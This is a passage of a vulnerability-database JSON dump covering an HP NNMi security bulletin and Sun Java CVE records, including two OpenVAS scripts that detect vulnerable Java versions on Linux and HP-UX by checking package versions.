http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk5uIHYACgkQ4B86/C0qfVlPDgCdFeqfoaamrARzUiqlpSuWFvK8\r\nFLgAnRIzmRNNn78sy7TyYJHPjgPHObei\r\n=y8+8\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:DOC:27037", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27037", "title": "[security bulletin] HPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Multiple buffer overflows and code executions.", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "SECURITYVULNS:VULN:10369", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10369", "title": "Sun Java multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2019-04-29T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800975\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\");\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later,\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27\");\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer)\n exit(0);\n\n# and 1.6 < 1.6.0_17 (6 Update 17)\nif(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "Check for the Version of Java", "modified": "2017-12-22T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:835225", "href": "http://plugins.openvas.org/nasl.php?oid=835225", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02503", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_id(835225);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", 